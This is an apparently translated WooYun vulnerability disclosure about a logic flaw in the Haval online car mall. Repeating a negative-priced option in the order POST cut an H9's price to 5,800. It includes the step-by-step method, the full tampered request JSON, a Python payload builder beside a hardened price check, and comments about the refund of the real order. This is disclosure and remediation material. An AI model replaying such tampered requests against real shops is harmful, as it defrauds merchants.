
Vulnerability summary

Defect ID: wooyun-2016-0200301

Title: Haval car mall defect: how I bought a Haval H9 for 5,800 (list price 270,000)

Vendor: gwm.com.cn

Author: 江湖闯名号

Submitted: 2016-04-25 12:13

Fixed: 2016-06-17 10:10

Published: 2016-06-17 10:10

Vulnerability type: Design flaw / logic error

Severity: High

Self-rated Rank: 20

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-25: Details sent to the vendor; awaiting the vendor's handling
2016-05-03: Vendor confirmed; details disclosed to the vendor only
2016-05-13: Details disclosed to core white hats and relevant domain experts
2016-05-23: Details disclosed to regular white hats
2016-06-02: Details disclosed to intern white hats
2016-06-17: Details disclosed to the public

Brief description:

Haval car mall defect: how I bought a Haval H9 for 5,800 (list price 270,000)

Detailed description:

When the custom car configuration parameters are POSTed, the same option can be written in repeatedly, and every copy is added in and lowers the price again. Because the minimum payment is 5000 and the deduction for this configuration item is -1000, the lowest you can end up paying is 5800. Other models cannot be abused this way because they have no price-reducing option.
1. Visit the car models in the Haval car mall:
http://mall.haval.com.cn/carload/spuSelector.html

2. Select the Haval H9

1.png

3. Under the equipment options, tick “五人座” (five-seat), -10000

2.png

4. Click Add to cart or Buy now and inspect the request.

3.png

5. Look at the returned data; this is what gets modified next.

4.png

6. Re-POST the data with a tool, repeating the item {"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"} 27 times, which amounts to subtracting 270,000 (27W).

7. The returned data, obtained again:

5.png
baidaJsonStr={"userJokerDetails":[{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1324,"PART_ID":359,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"灰黑内饰"},{"PRODUCT_ID":10387,"BAIDA_TYPE":2,"PARAM_ID":1325,"PART_ID":"387","MATCH_PARAM_ID":295,"ADD_PRICE":"0","BAIDA_NAME":"卷云银纹装饰板"},{"PRODUCT_ID":10387,"BAIDA_TYPE":1,"PARAM_ID":1323,"PART_ID":296,"MATCH_PARAM_ID":295,"ADD_PRICE":0,"BAIDA_NAME":"极地白"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_P
ARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"},{"PRODUCT_ID":10387,"BAIDA_TYPE":3,"PARAM_ID":1326,"PART_ID":376,"MATCH_PARAM_ID":295,"ADD_PRICE":"-10000","BAIDA_NAME":"五人座"}],"PRODUCT_ID":10387,"MATCH_PARAM_ID":295,"BASE_PRICE":275800,"ADD_PRICE_ALL":-10000,"USER_JOKER_ID":"","SAVE_MODE":2}


8. On the page, find the data that came back from the first POST, replace it with the data obtained from the POST tool, then click Confirm purchase or put it in the cart.

6.png

9. Go to the cart page

7.png

10. Click Checkout

7.png

11. Enter the deposit payment screen

8.png

9.png

12. Payment successful

10.png

11.png

Proof of vulnerability:

(Same steps, request data and screenshots as in the detailed description above.)

Fix suggestion:

Validate the POST parameters: each parameter may appear only once. Also, I have already paid for this order; if it counts, I will go and pick up the car, and if it does not, please refund the money to my card, thank you!!! My order number: 20160424224109548908
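As an added illustration of the fix suggested here (this is not the mall's code, which is not on the page), the following Python compares a price routine that trusts the submitted baidaJsonStr with one that enforces the one-entry-per-parameter rule and prices options from a server-side catalog. The catalog values, the payload builder and the constants are assumptions modelled on the request shown above.

```python
import json
from collections import Counter

# Assumed server-side catalog: price adjustment per (PARAM_ID, PART_ID).
# Values are copied from the request in the report; the real catalog is not on the page.
CATALOG = {
    (1323, 296): 0,        # exterior colour "极地白"
    (1324, 359): 0,        # interior "灰黑内饰"
    (1325, 387): 0,        # trim panel "卷云银纹装饰板"
    (1326, 376): -10000,   # "五人座" (five-seat) option, the only price-reducing item
}
BASE_PRICE = 275800        # BASE_PRICE as it appears in the report's request

def make_payload(five_seat_copies: int) -> str:
    """Constructed baidaJsonStr in the shape shown in the report (not captured traffic)."""
    def item(param_id, part_id, price):
        return {"PRODUCT_ID": 10387, "PARAM_ID": param_id, "PART_ID": part_id,
                "MATCH_PARAM_ID": 295, "ADD_PRICE": str(price)}
    details = [item(1324, 359, 0), item(1325, 387, 0), item(1323, 296, 0)]
    details += [item(1326, 376, -10000)] * five_seat_copies
    return json.dumps({"userJokerDetails": details, "PRODUCT_ID": 10387,
                       "BASE_PRICE": BASE_PRICE}, ensure_ascii=False)

def vulnerable_total(baida_json: str) -> int:
    """Trusts the client: base price plus every submitted ADD_PRICE, duplicates included."""
    p = json.loads(baida_json)
    return int(p["BASE_PRICE"]) + sum(int(i["ADD_PRICE"]) for i in p["userJokerDetails"])

def hardened_total(baida_json: str) -> int:
    """Each PARAM_ID may be chosen once, and the price comes from the server catalog."""
    items = json.loads(baida_json)["userJokerDetails"]
    counts = Counter(int(i["PARAM_ID"]) for i in items)
    dupes = sorted(pid for pid, n in counts.items() if n > 1)
    if dupes:
        raise ValueError(f"configuration parameter submitted more than once: {dupes}")
    total = BASE_PRICE                      # never read BASE_PRICE from the client either
    for i in items:
        key = (int(i["PARAM_ID"]), int(i["PART_ID"]))
        if key not in CATALOG:
            raise ValueError(f"unknown option {key}")
        total += CATALOG[key]               # client-supplied ADD_PRICE is ignored
    return total

if __name__ == "__main__":
    print(vulnerable_total(make_payload(27)))   # 5800, the figure in the report's title
```

With one five-seat entry both routines agree on 265800; with the entry repeated 27 times the trusting routine drops to 5800 while the hardened one rejects the request before any price is computed.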

Copyright notice: please credit the source 江湖闯名号@乌云 when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2016-05-03 10:03

Vendor reply:

The manufacturer is handling this urgently.

Latest status:

None yet


Comments:

  1. 2016-04-25 12:13 | 疯狗 (certified white hat) ( Intern white hat | Rank:44 Vulns:2 | Having seen every vulnerability under heaven, my heart is naturally free of code.)

    Fully loaded, huh

  2. 2016-04-25 12:16 | 白开水 ( Regular white hat | Rank:273 Vulns:34 | The boundless horizon is my love~)

    Just asking: did you get the car?

  3. 2016-04-25 12:25 | hecate ( Regular white hat | Rank:823 Vulns:128 | ®Senior security engineer | WooYun certified √)

    Just asking: did you get the car?

  4. 2016-04-25 12:26 | PgHook ( Regular white hat | Rank:1020 Vulns:123 | Portulaca grandiflora Hook.)

    5800 for a bicycle??

  5. 2016-04-25 12:35 | px1624 ( Regular white hat | Rank:1151 Vulns:207 | px1624)

    Haval says: the car is yours~

  6. 2016-04-25 12:39 | j14n ( Regular white hat | Rank:2052 Vulns:363 | That j14n on weibo isn't me.)

    1 point.

  7. 2016-04-25 12:46 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    Tesla even gave one away for 1 yuan; no idea what Haval will say about 5800!!!

  8. 2016-04-25 13:06 | 齐迹 ( Regular white hat | Rank:804 Vulns:104 | Hiring security engineers in Chongqing. sec.zbj.com welcomes...)

    Just asking: did you get the car?

  9. 2016-04-25 13:42 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    @齐迹 No. Customer service just called me; they said they saw the order this morning and are investigating. They think my account was stolen, said the order amount is wrong, and want to change my amount.

  10. 2016-04-25 13:44 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    Why can't I dig up a bug at a vendor like Tesla? Found one at a domestic vendor instead, so sad!

  11. 2016-04-25 14:05 | crazykb ( Passer-by | Rank:30 Vulns:2 | The quieter you become, the more you are...)

    Give me one

  12. 2016-04-25 14:21 | 小苹果 ( Regular white hat | Rank:243 Vulns:62 | Swing the hoe well enough and there's no hole you can't dig)

    Just asking: did you get the car?

  13. 2016-04-25 15:51 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    @小苹果 No, everyone

  14. 2016-04-25 16:31 | 诚殷的小白帽 ( Intern white hat | Rank:76 Vulns:36 )

    Just asking: did you get the car?

  15. 2016-04-27 09:27 | 立志成为厨神的男人 ( Passer-by | Rank:15 Vulns:1 | I'm hungry)

    If it had been a Tesla bug, maybe they would have honored it

  16. 2016-04-27 10:55 | 丨丶钟情 ( Passer-by | Rank:6 Vulns:2 | Just looking, not submitting bugs)

    Just asking: did you get the car?

  17. 2016-04-27 16:58 | 胡小树 ( Intern white hat | Rank:66 Vulns:13 | I am a little tree)

    That 5800 is definitely down the drain, congrats OP

  18. 2016-04-28 17:09 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    It does feel a bit like it's down the drain. When they called they didn't outright deny the order, but they haven't refunded me either.

  19. 2016-05-01 18:07 | Hax0rs ( Intern white hat | Rank:65 Vulns:13 | Hax0rs)

    @江湖闯名号 Then the vendor deliberately ignores it, then there's no refund either, and then that's the end of it...

  20. 2016-05-03 10:11 | 北洋贱队 ( Regular white hat | Rank:252 Vulns:25 )

    Suspected financial fraud; file a police report and an arrest is guaranteed

  21. 2016-05-03 10:35 | byr5ec ( Passer-by | Rank:10 Vulns:2 | I'm pursuing all teh time 5h37|_!)

    For an order like this, the vendor not refunding isn't really a problem either.

  22. 2016-05-03 11:31 | 随风的风 ( Regular white hat | Rank:257 Vulns:95 | WeChat official account: 233sec, sharing assorted vulnerability ideas from time to time...)

    Just asking, was the 5800 refunded? 7 rank... 5800 for 7 rank...

  23. 2016-05-03 12:09 | 黑色的屌丝 ( Intern white hat | Rank:39 Vulns:6 | →_→→_→)

    Feels so sad

  24. 2016-05-03 12:24 | 钥匙君 ( Intern white hat | Rank:46 Vulns:17 | A lazy person)

    5800 gone...

  25. 2016-05-03 12:43 | Hax0rs ( Intern white hat | Rank:65 Vulns:13 | Hax0rs)

    5800 for 9 rank

  26. 2016-05-03 14:29 | 二维码 ( Intern white hat | Rank:61 Vulns:4 | When I jump up I'm just a big smooch)

    5800 for 9 rank

  27. 2016-05-03 17:13 | 江湖闯名号 ( Passer-by | Rank:13 Vulns:4 | Recently posted 3 Q-coin products; since they went unreviewed for a few days,...)

    5000 was refunded

  28. 2016-05-06 23:24 | 岛云首席鉴黄师 ( Regular white hat | Rank:488 Vulns:129 | icisaw.cn ultra-cheap virtual hosts and VPS, cashback on purchase, support...)

    @江湖闯名号 And the other 800?

  29. 2016-05-31 08:43 | px1624 ( Regular white hat | Rank:1151 Vulns:207 | px1624)

    5800 for 9 rank

  30. 2016-05-31 10:54 | un10ad ( Intern white hat | Rank:88 Vulns:14 | \/\/\/)

    5800 for 9 rank, worth it